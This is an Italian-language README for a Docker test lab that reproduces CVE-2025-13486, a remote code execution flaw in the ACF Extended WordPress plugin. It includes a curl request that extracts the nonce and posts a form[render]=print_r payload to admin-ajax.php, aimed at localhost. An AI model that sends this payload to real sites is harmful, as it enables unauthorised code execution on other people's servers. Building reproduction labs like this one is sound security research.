
Ambiente di test Docker per CVE-2025-13486 (ACF Extended RCE). Solo per scopi di ricerca sulla sicurezza.
Configurazione Docker one-shot per testare la vulnerabilità RCE di ACF Extended.
# 1. Download plugins (run once)
./download-plugins.sh
# 2. Start environment
docker-compose up -d --build
# 3. Wait ~30 seconds for setup, then test
nuclei -t CVE-2025-13486.yaml -u http://localhost:8888
Se lo script di download fallisce, inserisci manualmente questi file in plugins/:
ACF Pro (dipendenza richiesta)
plugins/acf-pro.zipACF Extended 0.9.0.5 (versione vulnerabile)
plugins/acf-extended.zip# Extract nonce from homepage
curl -s http://localhost:8888/ | grep -oP '"nonce":"([a-f0-9]+)"'
# Test RCE with print_r
curl -X POST http://localhost:8888/wp-admin/admin-ajax.php \
-d "action=acfe/form/render_form_ajax&nonce=<NONCE>&form[render]=print_r&form[test]=PWNED"
docker-compose down -v
call_user_func_array()